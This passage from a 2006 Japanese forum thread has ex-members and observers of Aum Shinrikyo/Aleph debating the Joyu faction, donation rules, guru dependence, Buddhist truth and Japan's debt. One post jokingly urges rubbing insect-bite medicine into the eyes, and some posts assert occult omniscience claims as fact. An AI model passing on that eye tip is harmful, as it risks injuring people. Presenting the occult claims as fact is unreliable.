442 :20:2006/08/25(金) 06:47:42 ID:EZ8DgYfJ
>>白龍さん
私はM派に誘われ、正大師自身と面談しましたが活動には参加しませんでした。
今ではそれで良かったと思っています。

活動から離脱した師の方々は、結局、M派で活動していると正大師の考えに帰依しなくてはいけないからだそうです。
皆それぞれ少しは意見が違うでしょうが、周りに付いている女性の師の方々は「それは正大師のご意志じゃない」とかうるさいようです。
A派的な帰依が嫌とか合わないとか考えてM派に来たら、今度は正大師の意見に全て拘束されるのでは意味がないと。
結局、正大師への依存がM派という判断だそうです。依存しやすい女性が多いのも納得。

443 :名無しさん@3周年:2006/08/25(金) 08:12:46 ID:1Eqj41gA
優秀性と言っても、技術が即、優秀性になるとは思えないし、もっぱら
文明に精神性が追いつかなくて国が滅んでいます。
今の人類の脳では理解できない事に次の優秀性があるとしたら、それを
示して、理解してもらうには、我々は老人であるかもしれません。

その、間を埋める具体的な方法はありますか?

444 :名無しさん@3周年:2006/08/25(金) 08:52:34 ID:1Eqj41gA
人生の相談を頼む時、キャンディさんしかいないと思っています。

それは、依存ではなく、逆に、役立ってもらう事になります。



445 :白龍:2006/08/25(金) 09:42:32 ID:2NKNZP0q
>>442
>活動から離脱した師の方々は、
>結局、M派で活動していると正大師の考えに帰依しなくてはいけないからだそうです
>皆それぞれ少しは意見が違うでしょうが、周りに付いている女性の師の方々は「それは正大師のご意志じゃない」とかうるさいようです。
>A派的な帰依が嫌とか合わないとか考えてM派に来たら、今度は正大師の意見に全て拘束されるのでは意味がないと。

やはりオウム時代の体質から抜けるのには、時間がかかるんでしょうね。
体質改善するのに時間がかかるように。
女性の師で、やいやい言いそうな人いますもんね。
上祐さんが、何も言わない分、私が言ってやらなくちゃみたいな、
感覚なのか、自分の働き場所を見つけてはりきっているのか分かりませんが、
他への押し付けは、結局A派と同じ道を歩むことになりかねないです。
押し付けずに、相手に考えさせればいいんですけどね。


>結局、正大師への依存がM派という判断だそうです。依存しやすい女性が多いのも納得。

私も見ていてそう思う部分があります。女性に限らず男性でもね。

20さん、いろいろ教えていただいて感謝しています。
また、いろいろお聞きすることが、あるかと思いますが、
その時は、また教えていただければありがたいです。

446 :名無しさん@3周年:2006/08/25(金) 10:12:08 ID:+vc6USvr
>>119
サマナの中には現世的にも優秀で、
現世で充分やっていけるのに宗教的な使命を感じて、
残っている立派なサマナもいる。
帰るに帰れない立派とはいえないサマナもいる。

しかし、一度も出家していない人と比べると、
それでもサマナは立派だといえる。
自己の全財産を布施するということは、
そう簡単にはできない。


447 :白龍:2006/08/25(金) 10:18:23 ID:2NKNZP0q
>>446
>しかし、一度も出家していない人と比べると、
>それでもサマナは立派だといえる。
>自己の全財産を布施するということは、
>そう簡単にはできない。

それはその通り。
衆生の救済の意欲に燃えて、全財産を布施して出家するのは、
なかなか出来ることではないと思ってます。

しかし、今現在は、
>帰るに帰れない立派とはいえないサマナもいる。

ここが、大きな問題になっているのでは?


448 :和井 恵:2006/08/25(金) 10:24:48 ID:p+H6TabT
>>441
>ただ円が高いのは日本人の優秀性を示すことになる。
>それだけ高い円でも輸出ができるのだから。

問題は、これから起きるであろう
日本という国の「破産危機」を、
どう乗り越えられるのか、ということ。

最悪の場合は、「海外移住」という選択肢もあるでしょうが、
それを踏まえつつ、私たちは、今この日本に住み続けながら、
出来る限りの「可能性」を追求していくことが必要でしょう。
私たちが、真に「智慧在る者」になれるのかどうか…

それが試される時が近づいている。
そう、思いますね…

449 :和井 恵:2006/08/25(金) 10:42:50 ID:p+H6TabT
>帰るに帰れない立派とはいえないサマナもいる。

これを問題視するのではなく、
こういう「弟子達」を導き、育て上げていくことが出来ない、
「宗教的指導者たち」の方こそが問題なのではありませんか?

誰もが最初から、「立派な」人物などであるわけがない。
「無常(変化する)」をプラスに「転化」出来てこそ、
それらの実践が「真理」だと言えるのではありませんか?

450 :白龍:2006/08/25(金) 10:53:03 ID:2NKNZP0q
>>449
その通りですね。正論。

451 :名無しさん@3周年:2006/08/25(金) 11:03:56 ID:54PO3Ku4
それはちょっと違いますかね、微妙に。
私は心理とは究極の境地と考えます。
無常をプラスに転化するのではなく
変化しても常にプラスの状態が理想と考えます。
つまり変化をプラスにしていくではなく
変化に対し微動だにしないで常に一定のプラスを
保ち続けることです。

452 :白龍:2006/08/25(金) 11:11:04 ID:2NKNZP0q
>>451
なるほど。
でも、変化をプラスに転化できるから、
プラスの状態を、一定に保つことが出来るんじゃないでしょうか?
言い回しの違いだけで、同じことを言ってるような気がするのですが・・・。
違うのでしょうか?

453 :名無しさん@3周年:2006/08/25(金) 11:15:16 ID:+vc6USvr
>>448
これから北京オリンピックにかけて、
中国関連の株が上がり、
かつて日本であったようなバブル経済が、
中国で再現されるらしい。
その後日本のようにバブルが崩壊するらしい。
ここで中国関連株をうまく取り扱えばボロ儲けできるらしい。
日本が破産するという話は聞かないけどね?
という私は全く株に興味はない。
日本が破産する根拠は?


454 :名無しさん@3周年:2006/08/25(金) 11:26:44 ID:54PO3Ku4
>>452
厳密に言うとプラスに転化させるというのは
それだけで「行い」が必要なわけです。
転化させること無くしてもプラスの状態が続くのが
真理と考えます。


455 :名無しさん@3周年:2006/08/25(金) 11:30:56 ID:4lXcrA1l
>>443
私の修行が完成したら、
神通をメインにして、
現世的にも、宗教的にもプラスになる、
夢のような宗教を提案したい。
アニメーションとかネットとかで宣伝し、
強力に布教を勧めたい。
しかし、これは私の夢というより、
幻影というか錯覚かも…。

今の日本人は目標を失っているから、
マイホーム主義とか自己実現ぐらいしか考えられない。
でも宗教的な資質はあると思う。
漫画の「鋼の錬金術師」でも、
功徳の理論のようなものを主張しているしね。

456 :名無しさん@3周年:2006/08/25(金) 11:35:52 ID:1Eqj41gA
すべての対策は、無意味かもしれない。
破産したくない→消費税→倒産→貧困→破産

たいがい悪循環する。
元々荒野だった土地を開拓したのは人間だ。
先の大戦で、一升の米と二千円で放り出された兵士もどうにか生きて、
この繁栄に至った。
そっちの方が面白いかもしれんな。

457 :和井 恵:2006/08/25(金) 11:48:00 ID:p+H6TabT
>>451
>無常をプラスに転化するのではなく
>変化しても常にプラスの状態が理想と考えます。

それは、「自己の安定」を中心として考えるのか、
それとも「移りゆく状況」を改善して行くことを
中心として考えてゆくのか、
という「目的意識」の違いだと思います。

ただ、「自己の安定に留まっている」だけが目的ならば、
その考え方でもいいのでしょう。

しかしその時は、外部の変化に対しては、
ただの「傍観者」となってしまいますよね。

458 :和井 恵:2006/08/25(金) 11:54:13 ID:p+H6TabT
>>453
>日本が破産する根拠は?

今現在、今までの「国債の乱発」などによって、
日本という国が抱え込んでしまっている
「負債総額(国の借金)」を知らないのですか?

この問題から派生して、「年金問題」や「健康保険」、
さらには「消費税の大幅アップ」といったような
問題を山積させてしまっているのが現状でしょ?

459 :名無しさん@3周年:2006/08/25(金) 11:54:53 ID:54PO3Ku4
>>457
そうですね、外部の変化というのは無限にありますから
それを含めて考えると変化を起こさなくてはならなくなる。
ゆえに一定ではない。すなわち真理ではない。
個としては真理はあっても外部状況を含めると真理でなくなる。
ゆえに絶対の真理というものは無いと考えます。



460 :和井 恵:2006/08/25(金) 11:58:59 ID:p+H6TabT
>すべての対策は、無意味かもしれない。

「それを言っちゃあ、お仕舞いよ。」
(フーテンの寅さんの決め台詞、より)

461 :和井 恵:2006/08/25(金) 12:05:26 ID:p+H6TabT
>>459
>個としては真理はあっても外部状況を含めると真理でなくなる。

いいえ、「変化」を超えた「本質的な外部状況」というものがあるのです。
どのような変化を見せようとも、その「本質」だけは変わらない…

釈迦はそれを「湖面の底の風景」として喩えているのです。

462 :和井 恵:2006/08/25(金) 12:16:22 ID:p+H6TabT
>>456
>そっちの方が面白いかもしれんな。

再び「復興」への道を歩めれば、
それもまぁ、「面白い世界」になると言えるかも。
しかし、その時の「どさくさ」に紛れて、
「日本の持つ資産や利権」の多くを、
「海外の資本家」に奪われてしまうとしたら?

「資本主義」とは、弱肉強食の世界なのですよ。

463 :名無しさん@3周年:2006/08/25(金) 12:17:56 ID:KOte4RRZ
>それでもサマナは立派だといえる。
>自己の全財産を布施するということは、
>そう簡単にはできない。

財産のあった人はね、、、
逆に文無しも多くいたと思うんだけど
かきあつめても15万くらいしかない人が全財産布施して、なんだというのだ

漏れは、オウムには神通に興味のある人が集まるんだと思うけど
神通に興味のある男って、
女からみるとゼンゼン魅力的じゃないんだよね、、
フワフワして頼りない感じ
だって、たいして宛てにならないもの!おもしろいだけ、、
でも、ほんっと、オウムの男ってそんなんばっか!!
来るところ間違えたよ
適齢期だったのに、、(サマナはそんなもの見せびらかして
飯が食えるから、それもビズと言えるけどね、在家は貧乏になるだけ)

464 :名無しさん@3周年:2006/08/25(金) 12:20:12 ID:54PO3Ku4
本質的な外部状況なんてものは無いでしょう。
本質をどのような方向に定義するかによって
全ての事象は変化します。
論理的に因が理解できてもでてきた答えを受け入られるかという
問題も出てくる。
心が一つでは理解できても二つ以上になると要素は無限に介入します。
いや、本質的な外部状況は一つあるとも言える。
ただそれを真に認識するには世の中から未知の要素を徹底的に
省かなくてはならなくなる。
ただ、現時点において証明できないものを無記として
捉えて置いておくならその限りではないです。






465 :名無しさん@3周年:2006/08/25(金) 12:22:34 ID:1Eqj41gA
一手打てども響かず。
資本主義なら資本主義の人間の最も足るものを置くべきだ。
Buddhistを置くべきではない。


466 :和井 恵:2006/08/25(金) 12:24:32 ID:p+H6TabT
>本質的な外部状況なんてものは無いでしょう。

私は、それこそが「ニルヴァーナ」なのだと考えています。

467 :名無しさん@3周年:2006/08/25(金) 12:25:28 ID:KOte4RRZ
てか、あんまり金払わないで、適当に信者やっていけば
オウムも悪くないんだろうけど、わてらのときは、マジになりすぎたから、、

教祖のバカ予言に惑わされて、こんなにイタイ目にあっても
まだ神通がどうの、言うのって、よほど懲りないんだと思うよ
新たな犠牲を出さないでくれよ、、

もうあたしは第三者の目線になってしまったけど
信じて金取られる方が、バカなんだなと
きっとサマナもそういう了解なんだよね
その神通を多少見せびらかして、大もうけできるなら、それも賢いのかもしれない
騙されるほうはさんざん、だよ
漏れは3,4百万払っても、願望成就しなかった、ってこんなに
食ってかかっているのに、まだ神通を売りにしたいんだってさ、、
まあ、好きな人にはおもしろいんだとしか、いいようがないね
好きな同士でやれば、文句も出ない

468 :和井 恵:2006/08/25(金) 12:27:59 ID:p+H6TabT
>資本主義なら資本主義の人間の最も足るものを置くべきだ。

「毒を以て毒を制す」ということ?

469 :和井 恵:2006/08/25(金) 12:37:44 ID:p+H6TabT
>Buddhistを置くべきではない。

「宗教活動」などではなく、「経済活動」を主流にしなければ、
この問題への対応は難しいでしょうね。

そして、本来、「仏教」というものは「宗教」などと言った
「限定されたモノ」ではなく、もっと応用範囲の広いモノだと思っています。

470 :白龍:2006/08/25(金) 12:41:37 ID:2NKNZP0q
>>459
>ゆえに絶対の真理というものは無いと考えます。

全てが無常の法則の下にあるとか、
無常に伴う生老病死、三苦などは、
絶対の真理と言っても良いように思いますがいかがですか?


471 :名無しさん@3周年:2006/08/25(金) 12:45:38 ID:KOte4RRZ
願い事叶わない、っていうと、まだ功徳が足りないのよ、と
まあ、教団では定説だけど、誰も、理由はわかんないんだよね
本当のところはね
で、まあ、年数が一桁だったときは、本当に功徳が足りないかもと
思って、積んでいたんだけど
10年たったら、ね
もう自分も若くなくなってきたし、と このまま信じてもヤバイと思った

だってサマナは、信者相手にまだ功徳が足りないんですよ、といえば
今日も布施が期待できるけど、
言われるこっちは、また貧乏になるんだぜ?
宗教なんてバカ相手に金儲けしたい奴が企むのさ
ごく普通の結論に達したよ
そんで文句言ったって、適当にけなしておけばいいとサマナは思っているしね!
ヘタすると、こっちが殺されかねない

472 :名無しさん@3周年:2006/08/25(金) 12:50:15 ID:pR4BwR8B
今日のキャンディ

ID:KOte4RRZ


473 :名無しさん@3周年:2006/08/25(金) 12:54:41 ID:KOte4RRZ
第一オウムの出家は若くて(今は年齢上がってしまったかも)
財産なんか持っていそうな奴は、あんまり見たことねえよ

ある程度年がいって、貯金があった人は別だけど
20かそこらで出家して、金なんかあったもんか


474 :名無しさん@3周年:2006/08/25(金) 12:57:21 ID:54PO3Ku4
>>470
それはあなたがどのように存在するものを真理と考えているか
でも変わってくると思います。
あなたは絶対の真理と定義する条件に何が必要であると思いますか?

私は絶対の真理は人間である以上知覚は不可能に近いと捉えます。
世の中にはまだ明らかにならない法則が無限にある。
カルマの法則とて絶対的に無いとは証明すらできない。
ブラックホールの中心では時間が完全に静止し特移点の概念すら謎。
全知全能でないかぎりこの世の真の姿は見えてきません。
私の言う絶対の真理はこの世界から未知の事象を完全になくした上で
あるべきであると思っています。
まあ、それは今のところ不可能なんですが。








475 :名無しさん@3周年:2006/08/25(金) 12:58:29 ID:KOte4RRZ
会社いかないでも、食わしてもらえると思った男が
いくんだと、漏れは思っているよ
だから、夢見たいな事がすきなんだと思う
責任感ないしね
言ったことに責任絶対もたない
平気だもの

476 :名無しさん@3周年:2006/08/25(金) 13:02:36 ID:KOte4RRZ
テレビ売ったら、写らないと返品される
でも、宗教って、うまくいかなければ、あなたのカルマですよ
とか、いくらでも言い訳できるもの
その時点で、返金すればいいんだけど
絶対金返さなくていいらしいし
文句言えば、ドスきかせて追い返すこともするしね

477 :名無しさん@3周年:2006/08/25(金) 13:06:19 ID:KOte4RRZ
ハルマゲドンこなかったのだって、質問ご法度なんだろ?
それで、適当に月会費だけ払って、あんまり熱心でなかった人なんかは
あら、来ませんでしたね、とか
たいしてうらんでないかもしれないけど、、

あるいは、それで儲けちゃった奴ね
腹も立たないよな、面の皮が厚ければね
文句言われたら、うるせえ、凡夫なんて穢れているんだから
少しくらいむしられたほうがいいんだ、とか思うんだろ

478 :白龍:2006/08/25(金) 13:08:51 ID:2NKNZP0q
>>473
初期の頃は、全財産布施で出家OKだったのかもしれないが、
そのうち、布施が少ないと、出家した後、徳不足で魔境に入るとかで、
ある一定額のお布施をしないと、出家できなくなったんじゃなかったかな。
何十万か何百万か知らないけど、規約があるみたいです。
出家前に、一生懸命働いていた人いましたよ。

あと借金のある人も、借金返してからじゃないと出家出来ないと思う。
借金したまま出家した人に、取立てが来て、
教団も対応が大変だったのかもしれませんね。
あと、修行の課業もあったと思います。

479 :白龍:2006/08/25(金) 13:15:07 ID:2NKNZP0q
>>474
>私の言う絶対の真理はこの世界から未知の事象を完全になくした上で
>あるべきであると思っています。

そこまで大きくとらえると、確かに今ある法則が、
絶対ではなくなる可能性も出てきますね。
一つの真理ととらえておくのが無難かな。

480 :名無しさん@3周年:2006/08/25(金) 13:37:42 ID:KOte4RRZ
>出家前に、一生懸命働いていた人いましたよ。

まあね、でもあとから衣食住は教団がもってくれるくらいの計算はするでしょう
無論、自分が食う以上に働く人も多くいるけど
てか、役に立つ人とお荷物になる人の差が激しいんだろうな
出家前に100万打か150万だか、布施しろって決められたそうで
まあ、働くのが苦手な人は
その時点であきらめるよね


481 :名無しさん@3周年:2006/08/25(金) 13:38:12 ID:yPbmhRK0
>446
サマナの中には現世的にも優秀で、
現世で充分やっていけるのに宗教的な使命を感じて、
残っている立派なサマナもいる。


残っている人より現実をしっかり認識し、誤りは誤りと認めてやめた人の方が私は立派だと考えます。
あと、アーレフの人より優秀な人は現世にはいて捨てるほどいますよ。
世間を知らないから自分たちを優秀だなんて自画自賛できるのだと思います。


>しかし、一度も出家していない人と比べると、
それでもサマナは立派だといえる。

自分の好きでやっているのだからそれだけで立派というのはおかしい。

482 :白龍:2006/08/25(金) 14:00:41 ID:2NKNZP0q
>>480
>まあね、でもあとから衣食住は教団がもってくれるくらいの計算はするでしょう

財施部にばかりまわされると、ちとがっかりする人もいるかな。

>まあ、働くのが苦手な人は
>その時点であきらめるよね

そりゃそうですね。

483 :名無しさん@3周年:2006/08/25(金) 14:02:02 ID:3IDczeSK
>私の言う絶対の真理はこの世界から未知の事象を完全になくした上で
>あるべきであると思っています。

その未知も解析・理解できるから「絶対の真理」なのでは?
それを無くしてしまって、自分たちの都合のいい状態からの出発はどうかなぁと思います。


484 :名無しさん@3周年:2006/08/25(金) 14:07:54 ID:3IDczeSK
そもそも「未知」ってのは魂のレベルにいくと存在しなくなると思うのです。
ある程度ヨーガに精通し、瞑想に精通するとアジナーチャクラの領域にある「叡知」の
世界と繋がりいろんな情報・知識を知ることができるようになります。
知りたいと思えば即知ることになる。
これはもう「未知」がなくなった状態ではないでしょうか?


485 :名無しさん@3周年:2006/08/25(金) 14:19:03 ID:54PO3Ku4
>>484
では汝に聞くが光は波の性質を持っている。
光を伝えるモノとは何ですか?(物理的に)
またブラックホールの特異点の先の正体は何ですか?ww

尊師ですら最終解脱しても分からないわけです。
アーカシックレコード?で調べてくださいませんか?




486 :白龍:2006/08/25(金) 14:22:47 ID:2NKNZP0q
>>484
それは、ヨーガ理論的には、理解できます。
修行を進めていけば、それに近い体験はするのでしょうが、
この宇宙の全領域、過去から未来まで、
全ての知識を兼ね備えた魂という者に会ったことが無い以上、
とりあえず、それも仮説としておいて置くしかないのかなと思います。

487 :名無しさん@3周年:2006/08/25(金) 14:44:00 ID:3IDczeSK
>>484

私自身がそのような状態にあるわけではないのでw
ただインドヨーガではその「叡知」に繋がればそうなると教えます。

残念ながら麻原は解脱の「げ」の字もしてなかったと考えてる俺に「尊師ですら最終解脱しても分からない」
なんて言葉無意味ですよ。



488 :名無しさん@3周年:2006/08/25(金) 14:44:11 ID:1m9SGPMU
>446

一人で家出できない人が
理屈をつけてもらって出るのを「出家」

オウムはそのままだったんじゃないかい。

まあ、薬物までやられた人、やたら脅かされた人など同情すべき人はいるけれどね。



489 :名無しさん@3周年:2006/08/25(金) 14:56:53 ID:3IDczeSK
>>486

それは「知りたければ知る」そうでなければ「知らない」というだけでは?
つまり、世界の全ての知識に精通しようと思えばそうなるでしょうが、そこには
普通興味は持たないでしょう。・・・悟り・解脱を目指す者は。
その世界にアクセスする力だけがあれば十分と考えると思います。

その世界に捉われているとその世界の力をいつまでも増大し続けるでしょうが、
解脱・悟りはさらに高い領域なのでその力に執着しなくなりますから。
だから、全知とは言えるのだけでも全知とは言えない。そういうのが解脱者なのではないでしょうか?

例をだすとしたら、
あるヒマラヤ聖者で「マハー・オッタル・ババ」と呼ばれている方がいます。
彼は人前に滅多に姿を現さない、ヒマラヤの奥地も奥地に住む聖者の一人で、知る人ぞ知る方です。
彼は年齢不詳でありとあらゆる言語に精通し、同時に世界のあらゆる情勢に精通、日々その情報は更新
されている「叡知」の情報を引き出すのに優れた聖者です。

490 :名無しさん@3周年:2006/08/25(金) 15:15:24 ID:3IDczeSK
>>485

これはよく覚えてないので恐縮ですが、
現代科学の最先端では空間もまた「物質」では、あるいはそれに近い特性のものではないかと
考えているらしいです。
だから光が波の特性をもって伝わる。

ソース見つけたら張っておきますね

491 :名無しさん@3周年:2006/08/25(金) 15:20:17 ID:3IDczeSK
>>485

これも記憶が不確かなのですが・・・もちろん情報ソースは探します。
超弦理論の最先端で「M理論」なるものがあるのですが、それが特異点のことを
説明してたと記憶。
まあ、まだ仮設ですがこの考え方が今のところ最先端らしいです。

492 :名無しさん@3周年:2006/08/25(金) 15:30:31 ID:oHTlqcF9
>>481
立派というのは厳密にいうと、
エネルギーが漏れているチャクラが上にあるということ。
エネルギー的な概念がないならば、
世間にいくらでも優秀な人がいるといえる。
あなたの定義する優秀とは何か?


493 :名無しさん@3周年:2006/08/25(金) 15:46:16 ID:QRNvpJbE
>>472
お前の書き込み面白くない。
来るな!
どうしても書きたいならコテハンつけろ!

494 :名無しさん@3周年:2006/08/25(金) 16:21:07 ID:3IDczeSK
>>492

サマナでも性欲の戒を破ってる方はたくさんおられます。
っていうか正悟師でさえ破ってる方がいる。
ということはサマナでも現世の人でもあまりかわらないとこから漏れてると。
エネルギー的にもそうならあなたの論は正しくないことになる。

495 :名無しさん@3周年:2006/08/25(金) 16:27:09 ID:3IDczeSK
>>485

たしか最終解脱って全知ではなかったかな?
俺は神仙の会の頃にそう聞いた。
たしか仏の尊号にもそのようなものがあったハズ。
全ての世界を経験し尽して理解し尽した・・・のではなかったのかな?最終解脱。

496 :481:2006/08/25(金) 16:44:58 ID:yPbmhRK0
>492
446の人が言っているように「現世的に」優秀という意味で使いました。

私が見たところでは一つの部署で「現世的に」優秀と言える人は財施部で2〜3人くらい、
内ワークではゼロだったと思います。

497 :481:2006/08/25(金) 16:52:28 ID:yPbmhRK0
あくまで私が関わった範囲内のことです。
アヌーパマ師なんかは「現世的にも」優秀かなと思いましたけどどうでしょうか。

498 :名無しさん@3周年:2006/08/25(金) 16:52:33 ID:6b3zOEc9
結局、新しい国づくり(軍事国家体制)の前には、
オウムみたいな組織はつぶしとかなきゃいかん。
創価O会なんかは、どんどん発展させとくのが、国策!!



499 :名無しさん@3周年:2006/08/25(金) 16:56:48 ID:3IDczeSK
>>485

アカシックレコード読み取ることが出来るのが最終解脱者だったのでは?
そこには過去・現在・未来の全ての情報があるハズ。全てと言えば全てです。
それなのに知らないことがある・・・これはあなたの言う「尊師ですら最終
解脱しても分からないわけです」という言葉と矛盾するのでは?
予言もたしかコーザルの情報を見て言ってたハズですよね?(コーザルとアス
トラルとを両方観て予言しているって話があったはず)


500 :名無しさん@3周年:2006/08/25(金) 17:12:04 ID:elDNnG9t
>>458
流れを無視してカキコ。
日本は債権国ですんで、第三世界みたいに「破産」はしませんですよ。
あくまで辛いのは「財政」で、日本自体は金持ってます。
財政回復には税収増加、景気回復が最重要課題。オリンピックがいい影響をおよぼしてくれるといいですが。

501 :名無しさん@3周年:2006/08/25(金) 17:36:25 ID:hjv/FSjT
アヌーパマよりもソフトバンクとかNECの開発事業部の連中は100倍優秀だけど。

502 :名無しさん@3周年:2006/08/25(金) 17:37:47 ID:hjv/FSjT
外で働くのは嫌だ 冗談じゃない
だから一生教団から離れないと言ってるサマナもおられます。

503 :名無しさん@3周年:2006/08/25(金) 17:39:35 ID:hjv/FSjT
ミーティングでVT袋叩き。

504 :名無しさん@3周年:2006/08/25(金) 17:56:08 ID:f5Ggj2Uf
どーでもいいけど、変な団体だとは思わないかね
なんで、こんな変になれるのだか、不思議ではないかね
私は自分を普通に常識家だと思っているし
ここにいる人もそんなに非常識でないと思うけど

教祖が一人で変人なのよ
あの人が一人で、混ぜ返しているの!
それがグルだから、困る

505 :名無しさん@3周年:2006/08/25(金) 17:59:04 ID:1m9SGPMU
>500さん

日本は債権国っていっても、日本国が債権を持っているのではないのです。
だから破産はあり得るんです。

で、そのときは、
他国や他国の会社・金融機関に債権をもっている日本の保険会社とか、お金持ち
とかが、どの程度負担するか、キーポイントだと。
その人たちは、保険会社のえらいさんを含めて、権力者ですから、自分だけが良い、と。

で、他国などへの債権を持たないものは大変な生活になる、ということがあると。
税金その他はがやたら上がり、行政サービスはとんと貧しくなり、ということです。

506 :名無しさん@3周年:2006/08/25(金) 18:01:44 ID:hAlaqnrh
ΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩ

507 :名無しさん@3周年:2006/08/25(金) 18:05:20 ID:1m9SGPMU
>474

>私は絶対の真理は人間である以上知覚は不可能に近い
>世の中にはまだ明らかにならない法則が無限にある
>カルマの法則とて絶対的に無いとは証明すらできない--

ふむふむ、なるほど、

とすると、私、つまり「私が神、全知全能」という法則もあり得るのですが。
実は、余り無為痛くないけれど、それが真理でして、皆さん知らないだけ、
だったりして(ワラ)
なお、疑うならば、今晩、貴方の枕元に立ってあげますよ。
閑話休題

--------
で、そんな果てしなき「不可知論」に陥ってしまって、
貴方はどうするの?
「不可知論」の問題性は分ってるかい ?

ちなみに、カルマの法則って、それ自体矛盾しているのですがね。


508 :名無しさん@3周年:2006/08/25(金) 18:12:55 ID:f5Ggj2Uf
http://members.at.infoseek.co.jp/postx/aum/tansokin.html

オウムが撒いた菌のお話
このところ、2,3度、村井が人体実験をしていたというのを
朝おきぬけにもどきから、聞いて、
何をしたのというと、ひどすぎて言えない
彼は実験をおもしろがったんだ だから、カルマで殺されたという
実験の結果をグルに捧げたいと思ったと

検索してみたら、エボラの名前まで出てきおった

509 :名無しさん@3周年:2006/08/25(金) 18:20:22 ID:f5Ggj2Uf
漏れさ、ここに3年位か?住んでいるけど
ずっと一緒に書き込んでいた人たちは知っていると思うけど
あんまり事件のことは知らないほうだったし
今まで書き込んできたことも、数冊の(おもしろそうな暴露本)を
読んだ程度で、、怒りながら書いているわけ

で、本当は公判記録とか全部目を通すべきだと思うんだけど
大きな図書館までいくのが面倒という、非常にわがままな理由で
よく調べてはいないわけ、、
事件からオウムに興味を持った人というのは、本当に驚愕しているだろうし
起こっているよな、、すごすぎる


510 :名無しさん@3周年:2006/08/25(金) 18:23:33 ID:f5Ggj2Uf
盛れさあ、いうべきかどうかと思ったんだけど
教祖って、説法で言及した化学兵器その他、は実際手にしたり
作ったりしたわけじゃん
説法に地震兵器もでたよね
今の科学技術では、地震を起こすこともできるって、、
で、阪神大震災は予言したんだって?
んで、的中と、、
まさかと思うんだけど それは予算的に高いんだろうね?

511 :名無しさん@3周年:2006/08/25(金) 18:34:04 ID:pR4BwR8B
キャンディの新しいID

ID:f5Ggj2Uf


512 :名無しさん@3周年:2006/08/25(金) 18:37:01 ID:eygngDVS
上祐のツアー映像を見逃した人はどうぞ。
リアルタイムのHPでいくらでも見れます。

http://www.dai2ntv.jp/common/misc/kochi2/realtime/streaming/index.html




513 :名無しさん@3周年:2006/08/25(金) 18:38:19 ID:eygngDVS
今日の放送の後編も明日になればアップされるでしょう。

514 :名無しさん@3周年:2006/08/25(金) 19:05:36 ID:f5Ggj2Uf
http://news18.2ch.net/test/read.cgi/news2/1137858997/l50

515 :名無しさん@3周年:2006/08/25(金) 19:40:47 ID:cUYmXlOF
≪独占取材≫
“オウム”上祐派“巡礼ツアー”に密着新教団設立の動き?
(5分32秒)
http://www.ntv.co.jp/news/asx_dai2/060824048_300k.asx

516 :名無しさん@3周年:2006/08/25(金) 20:56:06 ID:f5Ggj2Uf
ダミー勧誘するんだって、教団のいいところしか話さないんでしょ
何があったか、決して教団から知らせないし
、、で、いい部分だけ信じてはまってしまった人も
これらの負の歴史を背負うわけでしょ
、、何も知らせず入信者増やすなんて、恥ずかしくないのかしらね
ある種の共犯にひきずりこむってことよ


517 :名無しさん@3周年:2006/08/25(金) 21:00:16 ID:RMiDnVIS
上祐派広報部長ラフチッタヴィヤナパディーナムッタ師補
http://www.geocities.jp/grbjh437/C2_2.htm#5

小林よしのりに謝罪しろよ!!


518 :名無しさん@3周年:2006/08/25(金) 21:01:49 ID:+EVpldou
太陽まんじゅうて、、プ

519 :名無しさん@3周年:2006/08/25(金) 21:07:47 ID:RMiDnVIS
日本テレビは小林を同行させて上祐&広末と対決させろ!!


520 :名無しさん@3周年:2006/08/25(金) 22:00:23 ID:f5Ggj2Uf
親睦ツアーって感じですか?
あんまり意味はなさそうな、、
もう少しジョウユウが漏れの好みだと、参加したいのだが、、

521 :名無しさん@3周年:2006/08/25(金) 22:07:43 ID:f5Ggj2Uf
漏れには関係の無いこったけど
やることも思いつかないなら、原点に戻って
四諦八正道とか、六波羅蜜とかやればいいんでないの

だいたいが、事件のことで忙しすぎて、まともな教学がしずらかったんだもの
グルの存在がないと、修法とかしずらいんだろうけど
教学は可能さね?
正直、この教団に世の中救うとかほざくのは不遜だよ
何がしたいんですか、と聞かれて、衆生を幸せにすることとかいうけど
もう顔が疲れきっておるよ
せめて、内側の探求というか、煩悩の滅却について
煩悩の滅却が苦悩の滅却だというのは不変だし、金もかからないし
口がうまい人には得意分野だかんね

522 :名無しさん@3周年:2006/08/25(金) 22:16:36 ID:f5Ggj2Uf
帰依帰依でやってきた人たちにはイタイことかもしれないけど
釈迦は絶対的な帰依をしないと解脱しないとか、言ってないよね
煩悩を捨てていった先に、平安があると、いう、割と説明するのは
簡単な、、しかし実際には難しいことだけと、根気良く説いたと

法を大事にすればいいんでないかしら
法灯明自灯明というんだし


523 :名無しさん@3周年:2006/08/25(金) 22:23:47 ID:f5Ggj2Uf
ようするに目玉が欲しいと、、
脱ぐなら今のうちかと、思いますよ〜

524 :名無しさん@3周年:2006/08/25(金) 22:28:19 ID:f5Ggj2Uf
ブロマイドとか数枚組の奴、売らないんですか?

525 :名無しさん@3周年:2006/08/25(金) 23:00:03 ID:QZw8iL62
↓オウム事件の元凶

http://www.google.co.jp/search?sourceid=navclient-menuext&ie=UTF-8&q=%E5%9F%8E%E5%86%85%E5%BA%B7%E5%85%89

526 :名無しさん@3周年:2006/08/26(土) 01:01:00 ID:YwPmcIe8
めずらしく誰もこないね、、どうしたんだ
みんなラブホか

ウナクール(虫さされの薬、液状)を
清潔な指に少しつける

その指で、目をこする  → スカーッとさわやかよ
ためしてね 失明してもしりません

527 :名無しさん@3周年:2006/08/26(土) 03:27:01 ID:6CQ704q6
こちら第2日本テレビ報道部−リアルタイム
http://www.dai2ntv.jp/common/misc/kochi2/realtime/streaming/index.html

≪独占取材・2≫
新教団設立ツアー?上祐代表に直撃!(5分54秒)
http://www.ntv.co.jp/news/asx_dai2/060825071_300k.asx

528 :名無しさん@3周年:2006/08/26(土) 03:29:59 ID:6CQ704q6
こちら第2日本テレビ報道部−リアルタイム
http://www.dai2ntv.jp/common/misc/kochi2/realtime/streaming/index.html

≪独占取材・1≫
“オウム”上祐派“巡礼ツアー”に密着新教団設立の動き?(5分32秒)
http://www.ntv.co.jp/news/asx_dai2/060824048_300k.asx

≪独占取材・2≫
新教団設立ツアー?上祐代表に直撃!(5分54秒)
http://www.ntv.co.jp/news/asx_dai2/060825071_300k.asx

